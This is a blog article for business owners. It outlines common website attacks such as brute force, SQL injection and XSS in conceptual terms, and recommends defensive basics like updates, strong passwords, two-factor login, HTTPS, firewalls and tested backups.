Website security basics every business owner should know

If your website handles customer data, even just a contact form, security is your responsibility. Not your developer's, not your hosting provider's. Yours. They can help you implement it, but the buck stops with the business.

That sounds harsh, but it's the reality of running a website in 2021. Data breaches make the news regularly, and the ICO doesn't care that you didn't know your WordPress site hadn't been updated in two years.

In my experience, the most common attacks

Brute force login attempts are the most frequent. Bots try thousands of username/password combinations against your login page. If your admin password is "admin123" or "password" (and you'd be appalled how often it is), they'll get in within minutes.

SQL injection is when an attacker submits malicious code through a form on your site, exploiting poorly written database queries to access or modify your database. A well-built site prevents this, but plenty of sites, especially older WordPress sites with outdated plugins, are vulnerable.

Cross-site scripting (XSS) is when an attacker injects malicious JavaScript into your site, which then runs in your visitors' browsers. This can steal login cookies, redirect users, or deface your site.

Outdated software is in my experience, the most common vulnerability of all. WordPress core, plugins, themes, PHP itself, your server's operating system, every piece of software has bugs, and bugs get discovered and patched regularly. If you're not applying those patches, you're leaving known vulnerabilities open.

The basics that protect you

Keep everything updated. WordPress core, every plugin, every theme, PHP, and your server's OS. Set up automatic updates where you can, and check manually at least monthly for everything else. This single habit prevents the majority of attacks.

Use strong, unique passwords. Every account, WordPress admin, hosting panel, FTP, database, should have a unique password of at least 16 characters. Use a password manager like 1Password or Bitwarden. Never reuse passwords across services.

Enable two-factor authentication on every admin account. Even if someone gets your password, they can't get in without the second factor. For WordPress, the Wordfence or WP 2FA plugins handle this well.

Install an SSL certificate. Your site should load over HTTPS, full stop. Let's Encrypt provides free SSL certificates, and most decent hosts will set this up automatically. If your site still loads over HTTP, fix it today.

Limit login attempts. The default WordPress login page allows unlimited attempts. A plugin like Limit Login Attempts Reloaded or the login protection built into Wordfence will block IPs after a set number of failed attempts.

Use a firewall. Cloudflare's free plan provides a basic web application firewall that blocks a lot of malicious traffic before it reaches your server. Wordfence adds an application-level firewall for WordPress specifically.

Backups are your safety net

No security measure is 100% effective. Backups are what save you when something gets through. You need automated daily backups stored somewhere separate from your website, not on the same server. Test your backups periodically by actually restoring one. A backup you can't restore is worthless.

For WordPress, I use WP Umbrella which handles automated backups, uptime monitoring, and gives you a single dashboard for managing multiple sites. UpdraftPlus is a good free alternative for single sites.

When to get professional help

If you've been hacked, don't try to fix it yourself. A professional can identify how the attacker got in, clean up properly (malware often hides in multiple places), and close the vulnerability. If you just clean up the obvious damage without finding the entry point, you'll be hacked again within days.

If you're not sure whether your site is secure or want someone to take a look, reach out at [email protected].